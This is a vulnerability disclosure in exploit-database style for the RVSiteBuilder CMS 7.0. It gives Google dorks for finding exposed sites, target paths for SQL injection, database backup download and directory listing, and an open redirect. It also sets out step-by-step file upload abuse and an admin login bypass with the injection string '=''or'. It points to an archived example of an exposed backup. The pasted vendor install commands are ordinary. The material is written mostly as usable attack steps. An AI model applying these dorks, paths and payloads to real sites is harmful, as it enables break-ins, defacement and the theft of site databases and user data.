RVSiteBuilder RVGlobalSoft CMS version 7.0 suffers from bypass, database disclosure, file download, path disclosure, remote file upload, and remote SQL injection vulnerabilities.
3c019473a8382ff8cf5b15499f6ea3ab
#################################################################################################
# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities
Vulnerabilities are =>
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101
#################################################################################################
# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************
# Vulnerabilities and Exploits includes =>
************************************
1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls
#################################################################################################
# Description : RVglobalsoft is the leading software solutions for hosting provider.
***********************************************************************
# Google Dork 1 : inurl:''/rvsindex.php/''
# Google Dork 2 : inurl:''/rvsindex.php?/user/login''
# Google Dork 3 : inurl:''/rvsindex.php/user/register''
# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js
#################################################################################################
# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
*****************************************************************************************
TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]
FOR CPANEL =>
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
FOR DURECTADMUN =>
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
/RVSeagullMod/lib/SGL/FrontController.php on line 257
Strict Standards: Declaration of SGL_MDB2::query() should be compatible with
MDB2_Driver_Common::query($query, $types = NULL, $result_class =
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82
Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()
should not be called statically, assuming $this from incompatible context in
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60
Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.
Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20
####################################################################################################
PATH => TARGET/ComponentAndUserFramework.php
Please edit /home2/DOMAINADDRESS/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
/usr/share/pear:/usr/local/lib/php"
# PATH for View Homepage => TARGET/rvsindex.php
####################################################################################################
# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
**************************************************************
TARGET/admin or this is the Admin Panel way =>
/rvsindex.php?/user/login/
# PATH Admin Panel Login WordPress =>
TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1
# PATH Admin Panel Login Joomla =>
TARGET/administrator
# PATH Admin Panel Login osCommerce =>
TARGET/admin
# PATH Admin Panel Login OpenCart =>
TARGET/admin
Note : Some RVSiteBuilder websites uses wordpress and joomla
but all files belongs to revsitebuilder and rvglobalsoft software.
It is totally weird vulnerability.
They have path like TARGET/blogweb or TARGET/osc
But some sites gives this error. Sometimes it asks for username and password.
Please contact your provider edit file php.ini
change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache
####################################################################################################
# PATH for Uploaded Documents =>
TARGET/documents/
####################################################################################################
# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => T
TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/
# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources
####################################################################################################
# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/
####################################################################################################
# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/
####################################################################################################
# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo
####################################################################################################
# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG
####################################################################################################
# PATH Learn Version => TARGET/js/scriptaculous/VERSION
####################################################################################################
# PATH for Optimizer => TARGET/optimizer.php
Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
####################################################################################################
# Other Paths that gives same error =>
#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php
Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
####################################################################################################
#QuickForm tutorial example - *Enter your name:
#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html
####################################################################################################
#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html
####################################################################################################
#{foreach:aFaqData,key,aValue} {if:aValue.category_name}
#/themes/rvtheme/faqweb/viewFaqWeb.html
###################################################################################################
#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html
####################################################################################################
# Testing forms
# /themes/default/testForms.php
#################################################################################################
# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability
# TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login
# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS
#################################################################################################
# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html
#################################################################################################
#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html
#################################################################################################
#RVTheme Admin Area and Users useable Login Paths =>
#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/
#####################################################################################################
#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt
#####################################################################################################
#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js
#####################################################################################################
Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]
/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/
#####################################################################################################
# RevSiteBuilder SQL Injection Vulnerability =>
*****************************************
#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
#################################################################################################
# What You See Is What You Get [ WYSIWYG ] Exploiter =>
*******************************************************
# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit
# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html
# Example Site => /images/....
# Allowed File Extensions => .txt .png .gif .jpg .xml
# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server
Please contact your host provider ssh as root to server and run.
For cpanel
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
For directadmin
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
Tutorial '' How to download RVsiteBuilder package file manually ? ''
For cPanel
--------------------
SSH to your cPanel server as root and run command
cd /usr/local/cpanel/whostmgr/docroot/cgi/
rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/
rm -f rvsitebuilderinstaller.tar
wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar
tar -xvf rvsitebuilderinstaller.tar
rm -f rvsitebuilderinstaller.tar
mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
tar -xvf scriptdownloadpackage.tar
/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php
Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
--------------------
For DirectAdmin
--------------------
SSH to your cPanel server as root and run command
cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages
wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
tar -xvf scriptdownloadpackage.tar
php scriptdownloadpackage.php
Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/
Reference => rvskin.com/rvlogin/rvloginssh
##################################################################################################
# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability
# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql
# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql
# Example Site DB Backup View => archive.is/Demkr
###################################################################################################
1) Register yourself to the site
TARGET/rvsindex.php?/user/register/
It says => You have successfully been registered. Please check your email for confirmation of your password.
Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
Pay attention : When you register choose your nickname carefully because it is important.
It says => Activation is successfully. Please login.
2) Login to the User Interface =>
TARGET/rvsindex.php?/user/login/action/login
3) You can use Account - User Preference - User Password Change Area
/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/
4) Go to your Profile like this =>
TARGET/rvsindex.php?/user/account/action/viewProfile/
Edit these Values
Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)
It says => Your profile details have been successfully updated
PATH : /themes/rvtheme/images/YOURNUCKNAME.
Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html
Just . [ dot ] is important here. You will see your index on that site.
#################################################################################################
# Serendipity RevSiteBuilder Blog Administration
# /blogweb/serendipity_admin.php
# Username : '=''or'
# Password : '=''or'
# You can use for both of them as '' admin '' '' admin ''
# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true
# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal
# /blogweb/uploads/yourfilename.rar
# Solution for Serendipity Blog Administration
# To mitigate this issue please upgrade at least to version 2.0.2:
# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
# Please note that a newer version might already be available.
#################################################################################################
How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess
cPanel
ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.
DirectAdmin
ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
Login to DirectAdmin as "admin" and Configure plugin on your panel.
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but
you can set plans in user level by RVsitebuilder Admin
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'
#################################################################################################
RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/
RVSiteBuilder Installation => rvsitebuilder.com/installation/
RVSiteBuilder and RVGlobalSoft Tutorials =>
rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#################################################################################################